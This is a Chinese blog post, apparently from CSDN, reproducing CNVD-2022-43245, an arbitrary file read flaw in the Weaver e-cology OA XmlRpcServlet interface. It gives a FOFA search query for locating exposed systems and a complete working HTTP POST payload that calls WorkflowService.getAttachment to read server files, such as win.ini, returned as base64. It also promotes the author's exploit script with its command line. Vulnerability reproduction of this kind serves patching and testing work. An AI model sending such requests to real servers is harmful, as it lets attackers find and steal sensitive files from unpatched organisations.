泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)

CNVD-2022-43245
泛微e-cology XmlRpcServlet接口处存在任意文件读取漏洞,攻击者可利用漏洞获取敏感信息。

1.漏洞级别

中危

2.影响范围

e-office < 9.5 20220113

3.漏洞搜索

fofa 搜索 app="泛微-OA(e-cology)"

4.漏洞复现

这个漏洞的复现方法很简单,只需要向目标网站的XmlRpcServlet接口发送数据即可。
构造请求包:

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: url
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=utf-8
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Length: 200

<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>WorkflowService.getAttachment</methodName><params><param><value><string>c://windows/win.ini</string></value></param></params></methodCall>

正常的响应结果如下:
在这里插入图片描述

注:下面的xml数据 元素之间不能使用tab或空格、回车,会导致服务器响应错误,因为在CDATA部分,文本将被视为原始字符数据,不会被解析器处理或解释。

这种情况下会导致异常响应,如下图:
在这里插入图片描述
上面复现成功的状态下,读取到的就是数据的base64编码,我们可以通过base64解密获取文件内容。
在这里插入图片描述

5.快捷利用

随文章附赠一个我写的漏洞复现脚本,可以指定url和filepath来读取文件,并直接将base64转换成正常文本。
执行

python3 ecology-xmlrpcservlet-readfile.py -u url -f file_path
#如果不选择文件地址 则默认为c://windows/win.ini

执行效果如下:
在这里插入图片描述
感兴趣的可以下载一下试试,或者github直接搜索ecology-xmlrpcservlet-readfile.py就能找到相应的文件了。
如果有问题欢迎随时交流~

在这里插入图片描述

  • 14
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值